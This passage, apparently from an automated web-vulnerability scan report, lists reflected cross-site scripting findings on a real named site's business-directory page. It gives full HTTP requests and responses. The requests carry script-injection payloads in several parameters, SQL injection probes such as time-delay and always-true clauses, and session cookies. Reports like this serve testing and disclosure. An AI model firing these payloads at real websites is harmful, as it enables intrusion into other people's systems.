125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424
%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59
100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91566
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="ChangeEmail" value="ec6f6"><script>alert(1)</script>d6a14042115a5cc08">
...[SNIP]...

4.189. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the HTML document as plain text between tags. The payload 9936b<script>alert(1)</script>288021037f2113630 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--9936b<script>alert(1)</script>288021037f2113630&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--9936b<script>alert(1)</script>288021037f2113630&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&Region
...[SNIP]...

4.190. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the HTML document as plain text between tags. The payload 5e98e<script>alert(1)</script>8db20327c0b was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com5e98e<script>alert(1)</script>8db20327c0b&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com5e98e<script>alert(1)</script>8db20327c0b&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c
...[SNIP]...

4.191. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53416"><script>alert(1)</script>60c763b2f67 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=53416"><script>alert(1)</script>60c763b2f67&KeyWord=--+Keyword+--&RegionId=&SubCatId= HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=EIOLPOGAOICHGPEICIBANOJC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="ChangeEmail" value="53416"><script>alert(1)</script>60c763b2f67">
...[SNIP]...

4.192. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [DOrder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the DOrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56313"><script>alert(1)</script>b12c9d365d01799f3 was submitted in the DOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A56313"><script>alert(1)</script>b12c9d365d01799f3&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c
125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424
%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59
100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91505
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=NGLKNADAEAJJMFFMIBBJIILP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="DOrder" value="A56313"><script>alert(1)</script>b12c9d365d01799f3">
...[SNIP]...

4.193. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [DOrder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the DOrder request parameter is copied into the HTML document as plain text between tags. The payload d289f<script>alert(1)</script>7dd8a52e41d was submitted in the DOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80
...[SNIP]...

4.194. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the HTML document as plain text between tags. The payload bd930<script>alert(1)</script>3775acfcd22 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSt
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

